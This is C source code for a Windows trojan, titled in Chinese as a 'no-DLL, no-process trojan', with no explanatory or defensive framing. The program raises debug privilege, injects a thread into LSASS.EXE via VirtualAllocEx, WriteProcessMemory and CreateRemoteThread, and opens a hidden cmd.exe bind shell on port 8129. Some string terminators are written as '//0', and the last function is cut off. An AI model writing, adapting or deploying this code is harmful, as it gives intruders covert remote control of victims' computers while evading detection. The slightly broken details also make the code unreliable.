无dll无进程木马

#include<windows.h>
//#include<winsock2.h>
#include <Shlwapi.h>
#include <tlhelp32.h>

#pragma comment(lib,"Shlwapi.lib")

//参数结构 ;
typedef struct _RemotePara{
   DWORD dwLoadLibrary;
   DWORD dwFreeLibrary;
   DWORD dwGetProcAddress;
   DWORD dwGetModuleHandle;
   DWORD dwWSAStartup;
   DWORD dwSocket;
   DWORD dwhtons;
   DWORD dwbind;
   DWORD dwlisten;
   DWORD dwaccept;
   DWORD dwsend;
   DWORD dwrecv;
   DWORD dwclosesocket;
   DWORD dwCreateProcessA;
   DWORD dwPeekNamedPipe;
   DWORD dwWriteFile;
   DWORD dwReadFile;
   DWORD dwCloseHandle;
   DWORD dwCreatePipe;
   DWORD dwTerminateProcess;

   DWORD dwMessageBox;
   char strMessageBox[12];
   char winsockDll[16];
   char cmd[10];
   char Buff[4096];
   char telnetmsg[60];

}RemotePara;

BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable); // 提升应用级调试权限
DWORD GetPidByName(char *szName); // 根据进程名称得到进程ID

// 远程线程执行体
DWORD __stdcall ThreadProc(RemotePara *Para){
 WSADATA WSAData;
 SOCKET listenSocket, clientSocket;
 struct sockaddr_in server_addr, client_addr;
 int iAddrSize = sizeof(client_addr);
 SECURITY_ATTRIBUTES sa;
 HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2;
 STARTUPINFO si;
 PROCESS_INFORMATION ProcessInformation;
 unsigned long lBytesRead = 0;

 typedef HINSTANCE (__stdcall *PLoadLibrary)(char*);
 typedef FARPROC (__stdcall *PGetProcAddress)(HMODULE, LPCSTR);
 typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE );
 typedef HINSTANCE (__stdcall *PGetModuleHandle)(HMODULE);

 FARPROC PMessageBoxA;
 FARPROC PWSAStartup;
 FARPROC PSocket;
 FARPROC Phtons;
 FARPROC Pbind;
 FARPROC Plisten;
 FARPROC Paccept;
 FARPROC Psend;
 FARPROC Precv;
 FARPROC Pclosesocket;
 FARPROC PCreateProcessA;
 FARPROC PPeekNamedPipe;
 FARPROC PWriteFile;
 FARPROC PReadFile;
 FARPROC PCloseHandle;
 FARPROC PCreatePipe;
 FARPROC PTerminateProcess;

 PLoadLibrary LoadLibraryFunc             = (PLoadLibrary)Para->dwLoadLibrary;
 PGetProcAddress GetProcAddressFunc       = (PGetProcAddress)Para->dwGetProcAddress;
 PFreeLibrary FreeLibraryFunc             = (PFreeLibrary)Para->dwLoadLibrary;
 PGetModuleHandle GetModuleHandleFunc     = (PGetModuleHandle)Para->dwGetModuleHandle;

 LoadLibraryFunc(Para->winsockDll);

 PWSAStartup   = (FARPROC)Para->dwWSAStartup;
 PSocket       = (FARPROC)Para->dwSocket;
 Phtons        = (FARPROC)Para->dwhtons;
 Pbind         = (FARPROC)Para->dwbind;
 Plisten       = (FARPROC)Para->dwlisten;
 Paccept       = (FARPROC)Para->dwaccept;
 Psend         = (FARPROC)Para->dwsend;
 Precv         = (FARPROC)Para->dwrecv;
 Pclosesocket  = (FARPROC)Para->dwclosesocket;
 PCreateProcessA    = (FARPROC)Para->dwCreateProcessA;
 PPeekNamedPipe     = (FARPROC)Para->dwPeekNamedPipe;
 PWriteFile         = (FARPROC)Para->dwWriteFile;
 PReadFile          = (FARPROC)Para->dwReadFile;
 PCloseHandle       = (FARPROC)Para->dwCloseHandle;
 PCreatePipe        = (FARPROC)Para->dwCreatePipe;
 PTerminateProcess  = (FARPROC)Para->dwTerminateProcess;

 PMessageBoxA       = (FARPROC)Para->dwMessageBox;

 PWSAStartup((WORD)((1<<8)|1), (LPWSADATA)&WSAData);
 listenSocket = PSocket(AF_INET, SOCK_STREAM, 0);
 if(listenSocket == INVALID_SOCKET)return 0;

 server_addr.sin_family      = AF_INET;
 server_addr.sin_port        = Phtons((unsigned short)(8129));
 server_addr.sin_addr.s_addr = INADDR_ANY;

 if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0;
 if(Plisten(listenSocket, 5))return 0;
 clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr, &iAddrSize);
// Psend(clientSocket, Para->telnetmsg, 60, 0);

 if(!PCreatePipe(&hReadPipe1,&hWritePipe1,&sa,0))return 0;
 if(!PCreatePipe(&hReadPipe2,&hWritePipe2,&sa,0))return 0;

 ZeroMemory(&si,sizeof(si)); //ZeroMemory是C运行库函数，可以直接调用
 si.dwFlags     = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
 si.wShowWindow = SW_HIDE;
 si.hStdInput   = hReadPipe2;
 si.hStdOutput  = si.hStdError = hWritePipe1;

 if(!PCreateProcessA(NULL,Para->cmd,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation))return 0;
 while(1) {
  memset(Para->Buff,0,4096);
  PPeekNamedPipe(hReadPipe1,Para->Buff,4096,&lBytesRead,0,0);
  if(lBytesRead) {
   if(!PReadFile(hReadPipe1, Para->Buff, lBytesRead, &lBytesRead, 0))break;
   if(!Psend(clientSocket, Para->Buff, lBytesRead, 0))break;
  }else {
   lBytesRead=Precv(clientSocket, Para->Buff, 4096, 0);
   if(lBytesRead <=0 ) break;
   if(!PWriteFile(hWritePipe2, Para->Buff, lBytesRead, &lBytesRead, 0))break;
  }
 }

 PCloseHandle(hWritePipe2);
 PCloseHandle(hReadPipe1);
 PCloseHandle(hReadPipe2);
 PCloseHandle(hWritePipe1);
 Pclosesocket(listenSocket);
 Pclosesocket(clientSocket);

// PMessageBoxA(NULL, Para->strMessageBox, Para->strMessageBox, MB_OK);

 return 0;
}

int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
 const DWORD THREADSIZE=1024*4;
 DWORD byte_write;
 void *pRemoteThread;
 HANDLE hToken,hRemoteProcess,hThread;
 HINSTANCE hKernel,hUser32,hSock;
 RemotePara myRemotePara,*pRemotePara;
 DWORD pID;

 OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);
 EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);

 // 获得指定进程句柄，并设其权限为PROCESS_ALL_ACCESS
 pID = GetPidByName("LSASS.EXE");
 if(pID == 0)return 0;
 hRemoteProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
 if(!hRemoteProcess)return 0;

 // 在远程进程地址空间分配虚拟内存
 pRemoteThread = VirtualAllocEx(hRemoteProcess, 0, THREADSIZE, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
 if(!pRemoteThread)return 0;

 // 将线程执行体ThreadProc写入远程进程
 if(!WriteProcessMemory(hRemoteProcess, pRemoteThread, &ThreadProc, THREADSIZE,0))return 0;
 
 ZeroMemory(&myRemotePara,sizeof(RemotePara));
 hKernel = LoadLibrary( "kernel32.dll");
 myRemotePara.dwLoadLibrary      = (DWORD)GetProcAddress(hKernel, "LoadLibraryA");
 myRemotePara.dwFreeLibrary      = (DWORD)GetProcAddress(hKernel, "FreeLibrary");
 myRemotePara.dwGetProcAddress   = (DWORD)GetProcAddress(hKernel, "GetProcAddress");
 myRemotePara.dwGetModuleHandle  = (DWORD)GetProcAddress(hKernel, "GetModuleHandleA");

 myRemotePara.dwCreateProcessA     = (DWORD)GetProcAddress(hKernel, "CreateProcessA");
 myRemotePara.dwPeekNamedPipe      = (DWORD)GetProcAddress(hKernel, "PeekNamedPipe");
 myRemotePara.dwWriteFile          = (DWORD)GetProcAddress(hKernel, "WriteFile");
 myRemotePara.dwReadFile           = (DWORD)GetProcAddress(hKernel, "ReadFile");
 myRemotePara.dwCloseHandle        = (DWORD)GetProcAddress(hKernel, "CloseHandle");
 myRemotePara.dwCreatePipe         = (DWORD)GetProcAddress(hKernel, "CreatePipe");
 myRemotePara.dwTerminateProcess   = (DWORD)GetProcAddress(hKernel, "TerminateProcess");

 hSock = LoadLibrary("wsock32.dll");
 myRemotePara.dwWSAStartup   = (DWORD)GetProcAddress(hSock,"WSAStartup");
 myRemotePara.dwSocket       = (DWORD)GetProcAddress(hSock,"socket");
 myRemotePara.dwhtons        = (DWORD)GetProcAddress(hSock,"htons");
 myRemotePara.dwbind         = (DWORD)GetProcAddress(hSock,"bind");
 myRemotePara.dwlisten       = (DWORD)GetProcAddress(hSock,"listen");
 myRemotePara.dwaccept       = (DWORD)GetProcAddress(hSock,"accept");
 myRemotePara.dwrecv         = (DWORD)GetProcAddress(hSock,"recv");
 myRemotePara.dwsend         = (DWORD)GetProcAddress(hSock,"send");
 myRemotePara.dwclosesocket  = (DWORD)GetProcAddress(hSock,"closesocket");

 hUser32 = LoadLibrary("user32.dll");
 myRemotePara.dwMessageBox = (DWORD)GetProcAddress(hUser32, "MessageBoxA");

 strcat(myRemotePara.strMessageBox,"Sucess!//0");
 strcat(myRemotePara.winsockDll,"wsock32.dll//0");
 strcat(myRemotePara.cmd,"cmd.exe//0");
 strcat(myRemotePara.telnetmsg,"Connect Sucessful!//n//0");
 
 //写进目标进程
 pRemotePara =(RemotePara *)VirtualAllocEx (hRemoteProcess ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);
 if(!pRemotePara)return 0;
 if(!WriteProcessMemory (hRemoteProcess ,pRemotePara,&myRemotePara,sizeof myRemotePara,0))return 0;

 // 启动线程
 hThread = CreateRemoteThread(hRemoteProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);
 
 FreeLibrary(hKernel);
 FreeLibrary(hSock);
 FreeLibrary(hUser32);
 CloseHandle(hRemoteProcess);
 CloseHandle(hToken);

 return 0;
}

BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable){
 TOKEN_PRIVILEGES tp;
 tp.PrivilegeCount = 1;
 LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);
 tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED:0;
 AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);
 return((GetLastError() == ERROR_SUCCESS));
}

DWORD GetPidByName(char *szName)
{
 HANDLE hProcessSnap = INVALID_HANDLE_VALUE;
 PROCESSENTRY32 pe32={0};
 DWORD dwRet=0;
 
 hProcessSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 if(hProcessSnap == INVALID_HANDLE_VALUE)return 0;
 
 pe32.dwSize = sizeof(PROCESSENTRY32);
 if(Process32First(hProcessSnap, &pe32))
 {
  do
  {
   if(StrCmpNI(szName,pe32.szExeFile,strlen(szName))==0)
   {
    dwRet=pe32.th32ProcessID;
    break;
   }
  }while (Process32Next(hProcessSnap,&pe32));
 }
 else return 0;
 
 if(hProcessSnap !=INVALID_HANDLE_VALUE)CloseHandle(hProcessSnap);
 return dwRet;